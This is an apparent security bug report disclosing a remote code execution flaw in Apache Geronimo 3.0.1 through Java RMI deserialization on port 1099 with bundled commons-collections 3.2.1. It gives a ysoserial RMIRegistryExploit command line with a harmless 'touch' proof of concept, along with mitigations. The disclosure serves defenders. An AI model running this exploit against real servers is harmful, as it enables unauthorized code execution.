Details
-
Bug
-
Status: Open
-
Critical
-
Resolution: Unresolved
-
3.0.1
-
None
-
Security Level: public (Regular issues)
-
linux,windows
-
Important
Description
The unsupported Geronimo old versions may be also affected
Description:
The Apache Geronimo default enabled JAVA RMI 1099 port and default bind ip 0.0.0.0, in bash, I use "grep -R InvokerTransformer" command, find defalut use commons-collections-3.2.1.jar.
[root@localhost geronimo-tomcat7-javaee6-3.0.1]# grep -R InvokerTransformer .
Binary file ./repository/commons-collections/commons-collections/3.2.1/commons-collections-3.2.1.jar matches
This looks like JAVA deserialization is taken for granted. But,I use ysoserial tools. CommonsCollections1 in response
java.lang.ClassNotFoundException: org.apache.commons.collections.map.TransformedMap (no security manager: RMI class loader disabled),
Seems to be classpath error, In java version 7u21 chanlog:
-------------------------------------
Changes to RMI
From this release, the RMI property java.rmi.server.useCodebaseOnly is set to true by default. In previous releases the default value was false.
This change of default value may cause RMI-based applications to break unexpectedly. The typical symptom is a stack trace that contains a java.rmi.UnmarshalException containing a nested java.lang.ClassNotFoundException.
For more information, see RMI Enhancements.
---------------------------------------
so,use 7u21 run application.
attack server:
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099 Jdk7u21 "touch /tmp/apache_geronimo"
Mitigation:
Commons-collections-3.2.1 users should upgrade to 3.2.2
Ports are not allowed for public access
Exploit:
(precondition: server run jre version is 7u21)
java -cp ysoserial-master-v0.0.5-gb617b7b-16.jar ysoserial.exploit.RMIRegistryExploit 192.168.197.25 1099 Jdk7u21 "touch /tmp/apache_geronimo"
Credit:
This issue was discovered by QingTeng cloud Security of Minded Security Researcher jianan.huang